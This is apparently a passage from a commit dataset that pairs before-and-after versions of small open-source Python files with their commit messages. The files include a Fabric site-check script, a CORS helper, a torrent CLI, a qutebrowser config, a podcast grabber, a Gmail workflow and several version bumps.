url(r"^invite/$", InviteView.as_view(), name="invite"),
url(r"^invite-stat/(?P<pk>\d+)/$", InviteStatView.as_view(), name="invite_stat"),
url(r"^topoff/$", TopOffAllView.as_view(), name="topoff_all"),
url(r"^topoff/(?P<pk>\d+)/$", TopOffUserView.as_view(), name="topoff_user"),
url(r"^addto/$", AddToAllView.as_view(), name="addto_all"),
url(r"^addto/(?P<pk>\d+)/$", AddToUserView.as_view(), name="addto_user"),
]
| unknown | Python |
059780cb468042327caf7ff55f29702f3de4d98f | Change formatting. | Aegis8/utility-fabfiles | checksite/fabfile.py | checksite/fabfile.py | ## Check if a website is up from two different locations, eg. localhost and a remote host.
## Used to confirm if an alert is valid or not.
## Normal curl result is displayed from each host.
## Usage: run fab checksite
## Import Fabric's API module
from fabric.api import *
##Get required info
##User can be hard-coded or asked for by using prompt()
env.user = prompt('Username: ')
#env.user = ""
##Keyfile location
#env.key_filename = "/path/to/key"
##Remote host can be hard-coded or asked by using prompt()
env.host = prompt('Please specify remote host: ')
#env.host = ""
##Site to be checked can be hard-coded or asked by using prompt()
env.site = prompt('Please specify the site to check: ')
#env.site = ""
@hosts("%s" % (env.host))
def remotecheck():
""" Run the check on the remote host """
run("curl -I %s" % (env.site))
def localcheck():
""" Run the check on localhost """
local("curl -I %s" % (env.site))
def checksite():
## Remotecheck
execute(remotecheck)
## Local check
execute(localcheck) | ## Check if a website is up from two different locations, eg. localhost and a remote host.
## Used to confirm if an alert is valid or not.
## Normal curl result is displayed from each host.
## Usage: run fab checksite
## Import Fabric's API module
from fabric.api import *
##Get required info
##User can be hard-coded or asked for by using prompt()
#env.user = ""
env.user = prompt('Username: ')
##Keyfile location
#env.key_filename = "/path/to/key"
##Remote host can be hard-coded or asked by using prompt()
env.host = prompt('Please specify remote host: ')
#env.host = ""
##Site to be checked can be hard-coded or asked by using prompt()
env.site = prompt('Please specify the site to check: ')
@hosts("%s" % (env.host))
def remotecheck():
""" Run the check on the remote host """
run("curl -I %s" % (env.site))
def localcheck():
""" Run the check on localhost """
local("curl -I %s" % (env.site))
def checksite():
## Remotecheck
execute(remotecheck)
## Local check
execute(localcheck) | mit | Python |
5edb070308e2597047f82ecb44cb84b314b488c9 | Use blank string instead of None as default origin | crodjer/qotr,sbuss/qotr,crodjer/qotr,sbuss/qotr,rmoorman/qotr,curtiszimmerman/qotr,curtiszimmerman/qotr,sbuss/qotr,rmoorman/qotr,crodjer/qotr,sbuss/qotr,curtiszimmerman/qotr,rmoorman/qotr,crodjer/qotr,curtiszimmerman/qotr,rmoorman/qotr | qotr/handlers/base.py | qotr/handlers/base.py | import logging
from fnmatch import fnmatch
from tornado import web
from qotr.config import config
L = logging.getLogger(__name__)
ALLOWED_ORIGINS = [o.strip() for o in config.allowed_origin.split(',')]
def set_cors_headers(handler):
'''
Given a handler, set the CORS headers on it.
'''
origin = handler.request.headers.get('Origin', '')
L.debug('Setting CORS headers for: %s based on %s', origin,
ALLOWED_ORIGINS)
if origin in ALLOWED_ORIGINS or any(fnmatch(origin, o)
for o in ALLOWED_ORIGINS):
handler.set_header("Access-Control-Allow-Origin", origin)
handler.set_header("Access-Control-Allow-Headers", "Content-Type")
# pylint: disable=W0223
class Base(web.RequestHandler):
'''
A base request handler.
'''
def prepare(self):
protocol = self.request.headers.get('x-forwarded-proto')
if config.redirect_to_https and \
self.request.method == 'GET' and \
protocol == 'http':
self.redirect('https://{}{}'.format(
self.request.host.split(':')[0], self.request.path
), permanent=True)
| import logging
from fnmatch import fnmatch
from tornado import web
from qotr.config import config
L = logging.getLogger(__name__)
ALLOWED_ORIGINS = [o.strip() for o in config.allowed_origin.split(',')]
def set_cors_headers(handler):
'''
Given a handler, set the CORS headers on it.
'''
origin = handler.request.headers.get('Origin')
L.debug('Setting CORS headers for: %s based on %s', origin,
ALLOWED_ORIGINS)
if origin in ALLOWED_ORIGINS or any(fnmatch(origin, o)
for o in ALLOWED_ORIGINS):
handler.set_header("Access-Control-Allow-Origin", origin)
handler.set_header("Access-Control-Allow-Headers", "Content-Type")
# pylint: disable=W0223
class Base(web.RequestHandler):
'''
A base request handler.
'''
def prepare(self):
protocol = self.request.headers.get('x-forwarded-proto')
if config.redirect_to_https and \
self.request.method == 'GET' and \
protocol == 'http':
self.redirect('https://{}{}'.format(
self.request.host.split(':')[0], self.request.path
), permanent=True)
| agpl-3.0 | Python |
1fdf1f4693ac17e41fce64b2d708102903bdf0ab | Support for magnet uris. | bittorrent/btc | btc/btc_add.py | btc/btc_add.py | import argparse
import time
import hashlib
import os
from . import btclient
from . import utils
from .bencode import bdecode, bencode
from .btc import encoder, decoder, client, error
_description = 'add torrent to client'
def main():
parser = argparse.ArgumentParser()
parser.add_argument('value')
group = parser.add_mutually_exclusive_group(required=False)
group.add_argument('-u', '--url', default=False, action='store_true')
group.add_argument('-f', '--file', default=False, action='store_true')
args = parser.parse_args()
if not args.url and not args.file:
args.file = os.path.exists(args.value)
args.url = not args.file
if args.url:
#if given URI starts with "magnet:?" then it's probably a magnet link
if args.value.startswith('magnet:?'):
#magnets with bittorrent info hash have "xt=urn:btih:"
if args.value.find("xt=urn:btih")>0:
client.add_torrent_url(args.value)
#TODO: Display confirmation about magnet having been added
#returning, because decoding torrent will report invalid file
return
else:
args.value = utils.httpize(args.value)
try:
torrent = utils.get(args.value, utf8=False)
except utils.HTTPError:
error('invalid url: %s' % args.value)
client.add_torrent_url(args.value)
elif args.file:
if not os.path.exists(args.value):
error('no such file: %s' % args.value)
try:
f = open(args.value, 'rb')
torrent = f.read()
f.close()
except:
error('reading file: %s' % args.value)
client.add_torrent_file(args.value)
added = None
try:
decoded = bdecode(torrent)
encoded = bencode(decoded[b'info'])
except:
error('invalid torrent file')
h = hashlib.sha1(encoded).hexdigest().upper()
while not added:
l = client.list_torrents()
for t in l:
if t['hash'] == h:
added = t
break
time.sleep(1)
print(encoder.encode([added]))
if __name__ == '__main__':
main()
| import argparse
import time
import hashlib
import os
from . import btclient
from . import utils
from .bencode import bdecode, bencode
from .btc import encoder, decoder, client, error
_description = 'add torrent to client'
def main():
parser = argparse.ArgumentParser()
parser.add_argument('value')
group = parser.add_mutually_exclusive_group(required=False)
group.add_argument('-u', '--url', default=False, action='store_true')
group.add_argument('-f', '--file', default=False, action='store_true')
args = parser.parse_args()
if not args.url and not args.file:
args.file = os.path.exists(args.value)
args.url = not args.file
if args.url:
args.value = utils.httpize(args.value)
try:
torrent = utils.get(args.value, utf8=False)
except utils.HTTPError:
error('invalid url: %s' % args.value)
client.add_torrent_url(args.value)
elif args.file:
if not os.path.exists(args.value):
error('no such file: %s' % args.value)
try:
f = open(args.value, 'rb')
torrent = f.read()
f.close()
except:
error('reading file: %s' % args.value)
client.add_torrent_file(args.value)
added = None
try:
decoded = bdecode(torrent)
encoded = bencode(decoded[b'info'])
except:
error('invalid torrent file')
h = hashlib.sha1(encoded).hexdigest().upper()
while not added:
l = client.list_torrents()
for t in l:
if t['hash'] == h:
added = t
break
time.sleep(1)
print(encoder.encode([added]))
if __name__ == '__main__':
main()
| mit | Python |
26205e73a7fc9651cbbd36c911bdd834f377d335 | Add some more searchengines | The-Compiler/dotfiles,The-Compiler/dotfiles,The-Compiler/dotfiles | qutebrowser/config.py | qutebrowser/config.py | config.load_autoconfig()
c.tabs.background = True
c.new_instance_open_target = 'window'
c.downloads.position = 'bottom'
c.spellcheck.languages = ['en-US']
config.bind(',ce', 'config-edit')
config.bind(',p', 'config-cycle -p content.plugins ;; reload')
config.bind(',rta', 'open {url}top/?sort=top&t=all')
config.bind(',rtv', 'spawn termite -e "rtv {url}"')
config.bind(',c', 'spawn -d chromium {url}')
css = '~/code/solarized-everything-css/css/solarized-all-sites-dark.css'
config.bind(',n', f'config-cycle content.user_stylesheets {css} ""')
c.url.searchengines['rfc'] = 'https://tools.ietf.org/html/rfc{}'
c.url.searchengines['pypi'] = 'https://pypi.org/project/{}/'
c.url.searchengines['qtbug'] = 'https://bugreports.qt.io/browse/QTBUG-{}'
c.url.searchengines['qb'] = 'https://github.com/The-Compiler/qutebrowser/issues/{}'
c.url.searchengines['btc'] = 'https://www.blockchain.com/btc/address/{}'
c.url.searchengines['http'] = 'https://httpstatuses.com/{}'
c.url.searchengines['duden'] = 'https://www.duden.de/suchen/dudenonline/{}'
c.url.searchengines['dictcc'] = 'https://www.dict.cc/?s={}'
#c.url.searchengines['maps'] = 'https://www.google.com/maps?q=%s'
c.fonts.tabs = '8pt monospace'
c.fonts.statusbar = '8pt monospace'
c.fonts.web.family.fantasy = 'Arial'
c.search.incremental = False
c.editor.command = ['emacs', '{}']
#c.qt.args = ['ppapi-widevine-path=/usr/lib/qt/plugins/ppapi/libwidevinecdmadapter.so']
c.content.javascript.enabled = False
config.source('perdomain.py')
| config.load_autoconfig()
c.tabs.background = True
c.new_instance_open_target = 'window'
c.downloads.position = 'bottom'
c.spellcheck.languages = ['en-US']
config.bind(',ce', 'config-edit')
config.bind(',p', 'config-cycle -p content.plugins ;; reload')
config.bind(',rta', 'open {url}top/?sort=top&t=all')
config.bind(',rtv', 'spawn termite -e "rtv {url}"')
config.bind(',c', 'spawn -d chromium {url}')
css = '~/code/solarized-everything-css/css/solarized-all-sites-dark.css'
config.bind(',n', f'config-cycle content.user_stylesheets {css} ""')
c.url.searchengines['rfc'] = 'https://tools.ietf.org/html/rfc{}'
c.url.searchengines['pypi'] = 'https://pypi.org/project/{}/'
c.url.searchengines['qtbug'] = 'https://bugreports.qt.io/browse/QTBUG-{}'
c.url.searchengines['qb'] = 'https://github.com/The-Compiler/qutebrowser/issues/{}'
c.url.searchengines['btc'] = 'https://www.blockchain.com/btc/address/{}'
#c.url.searchengines['maps'] = 'https://www.google.com/maps?q=%s'
c.fonts.tabs = '8pt monospace'
c.fonts.statusbar = '8pt monospace'
c.fonts.web.family.fantasy = 'Arial'
c.search.incremental = False
c.editor.command = ['emacs', '{}']
#c.qt.args = ['ppapi-widevine-path=/usr/lib/qt/plugins/ppapi/libwidevinecdmadapter.so']
c.content.javascript.enabled = False
config.source('perdomain.py')
| mit | Python |
b0631bdf88a6c86c0dd1c2bffe65b5bb7dbd9d5d | Bump version | dstufft/recliner | recliner/__about__.py | recliner/__about__.py | from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
__all__ = [
"__title__", "__summary__", "__uri__", "__version__", "__author__",
"__email__", "__license__", "__copyright__",
]
__title__ = "recliner"
__summary__ = ""
__uri__ = "https://github.com/crateio/recliner/"
__version__ = "0.2"
__author__ = "Donald Stufft"
__email__ = "donald.stufft@gmail.com"
__license__ = "Simplified BSD"
__copyright__ = "Copyright 2012 Donald Stufft"
| from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
__all__ = [
"__title__", "__summary__", "__uri__", "__version__", "__author__",
"__email__", "__license__", "__copyright__",
]
__title__ = "recliner"
__summary__ = ""
__uri__ = "https://github.com/crateio/recliner/"
__version__ = "0.1"
__author__ = "Donald Stufft"
__email__ = "donald.stufft@gmail.com"
__license__ = "Simplified BSD"
__copyright__ = "Copyright 2012 Donald Stufft"
| bsd-2-clause | Python |
c88e18d722fbcc5692010a2e4d672657994a13a4 | Add System Checks for requirements | fdroidtravis/repomaker,fdroidtravis/repomaker,fdroidtravis/repomaker,fdroidtravis/repomaker | repomaker/__init__.py | repomaker/__init__.py | import os
import sys
from django.core.checks import Error, register
from fdroidserver import common
from fdroidserver.exception import FDroidException
# The name of the default user. Please DO NOT CHANGE
DEFAULT_USER_NAME = 'user'
def runserver():
execute([sys.argv[0], 'migrate']) # TODO move into package hook?
if len(sys.argv) <= 1 or sys.argv[1] != 'runserver':
sys.argv = sys.argv[:1] + ['runserver'] + sys.argv[1:]
execute(sys.argv)
def process_tasks():
if len(sys.argv) <= 1 or sys.argv[1] != 'process_tasks':
sys.argv = sys.argv[:1] + ['process_tasks'] + sys.argv[1:]
execute(sys.argv)
def execute(params):
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "repomaker.settings_desktop")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
# create DATA_DIR if it doesn't exist
from django.conf import settings
if not os.path.isdir(settings.DATA_DIR):
os.makedirs(settings.DATA_DIR)
# execute pending command
execute_from_command_line(params)
@register()
def requirements_check(app_configs, **kwargs): # pylint: disable=unused-argument
errors = []
config = {}
common.fill_config_defaults(config)
common.config = config
if 'keytool' not in config:
errors.append(
Error(
'Could not find `keytool` program.',
hint='This program usually comes with Java. Try to install JRE. '
'On Debian-based system you can try to run '
'`apt install openjdk-8-jre-headless`.',
)
)
if 'jarsigner' not in config and not common.set_command_in_config('apksigner'):
errors.append(
Error(
'Could not find `jarsigner` or `apksigner`. At least one of them is required.',
hint='Please install the missing tool. On Debian-based systems you can try to run '
'`apt install apksigner`.',
)
)
try:
common.SdkToolsPopen(['aapt', 'version'], output=False)
except FDroidException:
errors.append(
Error(
'Could not find `aapt` program.',
hint='This program can be found in the Android SDK. '
'On Debian-based systems you can also try to run `apt install aapt` '
'to install it.',
)
)
return errors
| import os
import sys
# The name of the default user. Please DO NOT CHANGE
DEFAULT_USER_NAME = 'user'
def runserver():
execute([sys.argv[0], 'migrate']) # TODO move into package hook?
if len(sys.argv) <= 1 or sys.argv[1] != 'runserver':
sys.argv = sys.argv[:1] + ['runserver'] + sys.argv[1:]
execute(sys.argv)
def process_tasks():
if len(sys.argv) <= 1 or sys.argv[1] != 'process_tasks':
sys.argv = sys.argv[:1] + ['process_tasks'] + sys.argv[1:]
execute(sys.argv)
def execute(params):
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "repomaker.settings_desktop")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
# create DATA_DIR if it doesn't exist
from django.conf import settings
if not os.path.isdir(settings.DATA_DIR):
os.makedirs(settings.DATA_DIR)
# execute pending command
execute_from_command_line(params)
| agpl-3.0 | Python |
389f41b66aa83d802c88fc6205e6a697fafd77a5 | add docopt and an option to specify destination dir for media files | rsalmond/headline_news_podcasts,rsalmond/headline_news_podcasts | grabber.py | grabber.py | """
A very simple podcast grabber
Usage:
grabber.py [options]
Options:
--help
--dest=<location> Where to put downloaded files, default is CWD
"""
import feedparser
import requests
from docopt import docopt
import os
def dload(download_dir, url, status=True):
""" I use this code snippet so often i should submit a pr to requests """
tmp = url.split('/')
filename = tmp[len(tmp) - 1]
if status:
print 'Downloading {0} to {1}/{2} ...'.format(url, download_dir, filename)
response = requests.get(url, stream=True)
with open(os.path.join(download_dir, filename), 'wb') as f:
for chunk in response.iter_content(chunk_size=1024):
if chunk:
f.write(chunk)
f.flush()
def get_latest(feed):
feed = feedparser.parse(feed)
if len(feed['items']) > 0:
if 'links' in feed['items'][0]:
for link in feed['items'][0]['links']:
if 'type' in link and 'href' in link:
if 'audio' in link['type']:
dload(link['href'])
return
print 'Err: no media found'
if __name__ == '__main__':
arguments = docopt(__doc__, version="Simple Podcast Grabber 0.1")
dest_dir = arguments['--dest'] or '.'
statics = ['http://wsdownload.bbc.co.uk/worldservice/css/32mp3/latest/bbcnewssummary.mp3']
feeds = ['http://www.nhk.or.jp/rj/podcast/rss/english.xml',
'http://www.cbc.ca/podcasting/includes/wr.xml',
'http://www.npr.org/rss/podcast.php?id=500005']
for feed in feeds:
get_latest(dest_dir, feed)
for static in statics:
dload(dest_dir, static)
| import feedparser
import requests
import os
working_dir = './working'
def dload(url):
tmp = url.split('/')
filename = tmp[len(tmp) - 1]
response = requests.get(url, stream=True)
with open(os.path.join(working_dir, filename), 'wb') as f:
for chunk in response.iter_content(chunk_size=1024):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
f.flush()
def get_latest(feed):
feed = feedparser.parse(feed)
if len(feed['items']) > 0:
#from pprint import pprint
#pprint(feed['items'][0])
if 'links' in feed['items'][0]:
for link in feed['items'][0]['links']:
if 'type' in link and 'href' in link:
if 'audio' in link['type']:
dload(link['href'])
return
print 'Err: no media found'
if __name__ == '__main__':
statics = ['http://wsdownload.bbc.co.uk/worldservice/css/32mp3/latest/bbcnewssummary.mp3']
feeds = ['http://www.nhk.or.jp/rj/podcast/rss/english.xml',
'http://www.cbc.ca/podcasting/includes/wr.xml',
'http://www.npr.org/rss/podcast.php?id=500005']
for feed in feeds:
get_latest(feed)
for static in statics:
dload(static)
| unlicense | Python |
5bb46586a6bb87ad732310b81a9e14ef388e6711 | return 0 for patients with neoantigens | hammerlab/cohorts,hammerlab/cohorts | cohorts/functions.py | cohorts/functions.py | # Copyright (c) 2016. Mount Sinai School of Medicine
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import numpy as np
import pandas as pd
from varcode import EffectCollection
from varcode.effects import Substitution
def snv_count(row, cohort, **kwargs):
patient_id = row["patient_id"]
patient_variants = cohort.load_variants(
patients=[cohort.patient_from_id(patient_id)], **kwargs)
if patient_id in patient_variants:
return len(patient_variants[patient_id])
return np.nan
def nonsynonymous_snv_count(row, cohort, **kwargs):
patient_id = row["patient_id"]
patient_nonsynonymous_effects = cohort.load_effects(
only_nonsynonymous=True, patients=[cohort.patient_from_id(patient_id)], **kwargs)
if patient_id in patient_nonsynonymous_effects:
return len(patient_nonsynonymous_effects[patient_id])
return np.nan
def missense_snv_count(row, cohort, **kwargs):
patient_id = row["patient_id"]
patient_missense_effects = cohort.load_effects(
only_nonsynonymous=True,
patients=[cohort.patient_from_id(patient_id)],
filter_fn=lambda effect, variant_metadata: type(effect) == Substitution,
**kwargs)
if patient_id in patient_missense_effects:
return len(patient_missense_effects[patient_id])
return np.nan
def neoantigen_count(row, cohort, **kwargs):
patient_id = row["patient_id"]
patient_neoantigens = cohort.load_neoantigens(patients=[cohort.patient_from_id(patient_id)], **kwargs)
return len(patient_neoantigens[patient_neoantigens["patient_id"] == patient_id])
def expressed_neoantigen_count(row, cohort, **kwargs):
return neoantigen_count(row, cohort, only_expressed=True)
| # Copyright (c) 2016. Mount Sinai School of Medicine
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import numpy as np
import pandas as pd
from varcode import EffectCollection
from varcode.effects import Substitution
def snv_count(row, cohort, **kwargs):
patient_id = row["patient_id"]
patient_variants = cohort.load_variants(
patients=[cohort.patient_from_id(patient_id)], **kwargs)
if patient_id in patient_variants:
return len(patient_variants[patient_id])
return np.nan
def nonsynonymous_snv_count(row, cohort, **kwargs):
patient_id = row["patient_id"]
patient_nonsynonymous_effects = cohort.load_effects(
only_nonsynonymous=True, patients=[cohort.patient_from_id(patient_id)], **kwargs)
if patient_id in patient_nonsynonymous_effects:
return len(patient_nonsynonymous_effects[patient_id])
return np.nan
def missense_snv_count(row, cohort, **kwargs):
patient_id = row["patient_id"]
patient_missense_effects = cohort.load_effects(
only_nonsynonymous=True,
patients=[cohort.patient_from_id(patient_id)],
filter_fn=lambda effect, variant_metadata: type(effect) == Substitution,
**kwargs)
if patient_id in patient_missense_effects:
return len(patient_missense_effects[patient_id])
return np.nan
def neoantigen_count(row, cohort, **kwargs):
patient_id = row["patient_id"]
patient_neoantigens = cohort.load_neoantigens(patients=[cohort.patient_from_id(patient_id)], **kwargs)
if patient_id in patient_neoantigens["patient_id"].unique():
return len(patient_neoantigens[patient_neoantigens["patient_id"] == patient_id])
return np.nan
def expressed_neoantigen_count(row, cohort, **kwargs):
return neoantigen_count(row, cohort, only_expressed=True)
| apache-2.0 | Python |
f9e1dd68d5f57f75da73e6d3cf4b18d815de4c2f | Remove clutter from available_algorithms | TheReverend403/Pyper,TheReverend403/Pyper | commands/cmd_hash.py | commands/cmd_hash.py | import hashlib
from lib.command import Command
class HashCommand(Command):
name = 'hash'
description = 'Hashes text.'
def run(self, message, args):
# Remove duplicates
available_algorithms = hashlib.algorithms_guaranteed
if not args or len(args) < 2:
self.reply(message, '<b>/{0} [algorithm] [text]</b>, where <b>[algorithm]</b> is one of {1}'.format(
self.name, ', '.join(available_algorithms)), parse_mode='HTML')
return
algorithm = args[0].lower()
if algorithm not in available_algorithms:
self.reply(message, 'Invalid algorithm. Please choose one of {0}'.format(', '.join(available_algorithms)))
return
text = ' '.join(args[1:]).encode('utf-8')
hash_object = hashlib.new(algorithm)
hash_object.update(text)
self.reply(message, hash_object.hexdigest())
| import hashlib
from lib.command import Command
class HashCommand(Command):
name = 'hash'
description = 'Hashes text.'
def run(self, message, args):
# Remove duplicates
available_algorithms = list(set(x.lower() for x in hashlib.algorithms_available))
if not args or len(args) < 2:
self.reply(message, '<b>/{0} [algorithm] [text]</b>, where <b>[algorithm]</b> is one of {1}'.format(
self.name, ', '.join(available_algorithms)), parse_mode='HTML')
return
algorithm = args[0].lower()
if algorithm not in [x for x in available_algorithms]:
self.reply(message, 'Invalid algorithm. Please choose one of {0}'.format(
', '.join(available_algorithms)))
return
text = ' '.join(args[1:]).encode('utf-8')
hash_object = hashlib.new(algorithm)
hash_object.update(text)
self.reply(message, hash_object.hexdigest())
| agpl-3.0 | Python |
99115b69871033c08b4fb88b55960ec03e5bb353 | Fix filter problems | fniephaus/alfred-gmail | src/gmail.py | src/gmail.py | import datetime
import sys
from gmail_refresh import refresh_cache
from workflow import Workflow, PasswordNotFound, MATCH_SUBSTRING
from workflow.background import run_in_background, is_running
def main(wf):
if len(wf.args):
query = wf.args[0]
else:
query = None
if not wf.cached_data_fresh('gmail_list', max_age=3600):
refresh_cache()
item_list = wf.cached_data('gmail_list', None, max_age=0)
if item_list is not None:
if len(item_list) == 0:
wf.add_item('Your Gmail inbox is empty!', valid=False)
else:
for index, item in enumerate(item_list):
name = item['From'][
:item['From'].find("<") - 1].replace('"', '')
title = '%s: %s' % (name, item['Subject'])
subtitle = '%s - %s' % (item['Date'][:-6], item['snippet'])
arg = '%s %s' % (item['thread_id'], item['id'])
if not query or query.lower() in ' '.join([title, subtitle]).lower():
wf.add_item(title, subtitle, arg=arg, valid=True)
else:
wf.add_item("Could receive your emails.",
"Please try again or file a bug report!", valid=False)
# Update list in background
if not wf.cached_data_fresh('gmail_list', max_age=30):
background_refresh(wf)
wf.send_feedback()
def background_refresh(wf):
if not is_running('gmail_refresh'):
cmd = ['/usr/bin/python', wf.workflowfile('gmail_refresh.py')]
run_in_background('gmail_refresh', cmd)
if __name__ == '__main__':
wf = Workflow()
sys.exit(wf.run(main))
| import datetime
import sys
from gmail_refresh import refresh_cache
from workflow import Workflow, PasswordNotFound, MATCH_SUBSTRING
from workflow.background import run_in_background, is_running
def search_key_for_mail(mail):
elements = []
elements.append(mail['From'])
elements.append(mail['snippet'])
elements.append(mail['Subject'])
elements.append(mail['Date'])
return u' '.join(elements)
def main(wf):
if len(wf.args):
query = wf.args[0]
else:
query = None
if not wf.cached_data_fresh('gmail_list', max_age=3600):
refresh_cache()
item_list = wf.cached_data('gmail_list', None, max_age=0)
if item_list is not None:
if len(item_list) == 0:
wf.add_item('Your Gmail inbox is empty!', valid=False)
else:
if query:
item_list = wf.filter(
query, item_list, key=search_key_for_mail, match_on=MATCH_SUBSTRING)
for index, item in enumerate(item_list):
name = item['From'][
:item['From'].find("<") - 1].replace('"', '')
title = '%s: %s' % (name, item['Subject'])
subtitle = '%s - %s' % (item['Date'][:-6], item['snippet'])
arg = '%s %s' % (item['thread_id'], item['id'])
wf.add_item(title, subtitle, arg=arg, valid=True)
else:
wf.add_item("Could receive your emails.",
"Please try again or file a bug report!", valid=False)
# Update list in background
if not wf.cached_data_fresh('gmail_list', max_age=30):
background_refresh(wf)
wf.send_feedback()
def background_refresh(wf):
if not is_running('gmail_refresh'):
cmd = ['/usr/bin/python', wf.workflowfile('gmail_refresh.py')]
run_in_background('gmail_refresh', cmd)
if __name__ == '__main__':
wf = Workflow()
sys.exit(wf.run(main))
| mit | Python |
9faf52229e96000c2dbb79f2f4a1964751283b83 | upgrade version | DataCanvasIO/pyDataCanvas | datacanvas/version.py | datacanvas/version.py | version = "0.5.0"
| version = "0.4.9"
| apache-2.0 | Python |
6cfcf5ea2c4f1f53b7aa40ab503cd21392f444d1 | bump hotfix version to 1.0.1 | emory-libraries/ddi-search,emory-libraries/ddi-search | ddisearch/__init__.py | ddisearch/__init__.py | # file ddisearch/__init__.py
#
# Copyright 2014 Emory University
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''
Django website for search and display access to DDI XML descriptions
of research datasets such as those provided by the ICPSR. Uses
eXist-db for powerful full text searching.
'''
__version_info__ = (1, 0, 1, None)
# Dot-connect all but the last. Last is dash-connected if not None.
__version__ = '.'.join(str(i) for i in __version_info__[:-1])
if __version_info__[-1] is not None:
__version__ += ('-%s' % (__version_info__[-1],))
| # file ddisearch/__init__.py
#
# Copyright 2014 Emory University
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''
Django website for search and display access to DDI XML descriptions
of research datasets such as those provided by the ICPSR. Uses
eXist-db for powerful full text searching.
'''
__version_info__ = (1, 0, 0, None)
# Dot-connect all but the last. Last is dash-connected if not None.
__version__ = '.'.join(str(i) for i in __version_info__[:-1])
if __version_info__[-1] is not None:
__version__ += ('-%s' % (__version_info__[-1],))
| apache-2.0 | Python |
5dcd279434d0ab87409c699b9ed6f594ffdb61f5 | Update script to get location -add rate limiting -add bucket location caching | samchrisinger/osf.io,Johnetordoff/osf.io,DanielSBrown/osf.io,brianjgeiger/osf.io,mluo613/osf.io,DanielSBrown/osf.io,chrisseto/osf.io,felliott/osf.io,hmoco/osf.io,monikagrabowska/osf.io,adlius/osf.io,Nesiehr/osf.io,leb2dg/osf.io,alexschiller/osf.io,pattisdr/osf.io,amyshi188/osf.io,erinspace/osf.io,TomBaxter/osf.io,Johnetordoff/osf.io,pattisdr/osf.io,HalcyonChimera/osf.io,cwisecarver/osf.io,felliott/osf.io,hmoco/osf.io,wearpants/osf.io,monikagrabowska/osf.io,TomBaxter/osf.io,sloria/osf.io,icereval/osf.io,leb2dg/osf.io,caneruguz/osf.io,caseyrollins/osf.io,rdhyee/osf.io,alexschiller/osf.io,crcresearch/osf.io,baylee-d/osf.io,saradbowman/osf.io,Nesiehr/osf.io,sloria/osf.io,mattclark/osf.io,emetsger/osf.io,crcresearch/osf.io,laurenrevere/osf.io,icereval/osf.io,baylee-d/osf.io,DanielSBrown/osf.io,mluo613/osf.io,chennan47/osf.io,acshi/osf.io,leb2dg/osf.io,brianjgeiger/osf.io,samchrisinger/osf.io,monikagrabowska/osf.io,laurenrevere/osf.io,chennan47/osf.io,erinspace/osf.io,acshi/osf.io,hmoco/osf.io,cwisecarver/osf.io,binoculars/osf.io,pattisdr/osf.io,chennan47/osf.io,wearpants/osf.io,Nesiehr/osf.io,chrisseto/osf.io,aaxelb/osf.io,mluo613/osf.io,samchrisinger/osf.io,felliott/osf.io,mfraezz/osf.io,monikagrabowska/osf.io,Johnetordoff/osf.io,samchrisinger/osf.io,baylee-d/osf.io,amyshi188/osf.io,rdhyee/osf.io,binoculars/osf.io,mfraezz/osf.io,laurenrevere/osf.io,mluo613/osf.io,mfraezz/osf.io,adlius/osf.io,HalcyonChimera/osf.io,mattclark/osf.io,icereval/osf.io,chrisseto/osf.io,chrisseto/osf.io,adlius/osf.io,CenterForOpenScience/osf.io,aaxelb/osf.io,caseyrollins/osf.io,saradbowman/osf.io,TomBaxter/osf.io,CenterForOpenScience/osf.io,crcresearch/osf.io,emetsger/osf.io,acshi/osf.io,adlius/osf.io,leb2dg/osf.io,mfraezz/osf.io,cwisecarver/osf.io,caneruguz/osf.io,hmoco/osf.io,SSJohns/osf.io,CenterForOpenScience/osf.io,Nesiehr/osf.io,brianjgeiger/osf.io,cslzchen/osf.io,monikagrabowska/osf.io,DanielSBrown/osf.io,binoculars/osf.io,cwisecarver/osf.io,wearpants/osf.io,aaxelb/osf.io,caseyrollins/osf.io,rdhyee/osf.io,amyshi188/osf.io,emetsger/osf.io,cslzchen/osf.io,cslzchen/osf.io,aaxelb/osf.io,alexschiller/osf.io,caneruguz/osf.io,emetsger/osf.io,acshi/osf.io,mluo613/osf.